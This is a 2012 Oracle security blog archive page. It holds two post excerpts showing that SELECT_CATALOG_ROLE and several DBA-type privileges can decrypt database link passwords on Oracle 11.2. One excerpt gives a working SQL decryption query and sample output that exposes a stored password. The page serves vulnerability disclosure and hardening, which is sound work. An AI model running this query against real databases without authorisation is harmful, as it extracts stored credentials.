Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed

Archive for November, 2012

SYS Security

Hello Folks, A few people have told me that they thought only SYS could select db link passwords. Truth is any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well. SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view; NAME ——————————————————————————– USERID —————————— PASSWORD ——————————————————————————– TEST_LINK.ENTERPRISE.INTERNAL.UK DBLINK_ACCOUNT mongo If missing execute on [...]

Database Link Security

Hello Oracle Security folks, Good news and bad news – which would you like first? Ok.. so the bad news is that these user/role/privileges can select and decrypt DBLink passwords on 11.2, as the key to decrypt the ciphertext is included in the password itself. •SYS •SYSDBA •DBA •SYS WITHOUT SYSDBA •SYSASM •EXP_FULL_DATABASE •DATAPUMP_EXP_FULL_DATABASE •DATAPUMP_IMP_FULL_DATABASE [...]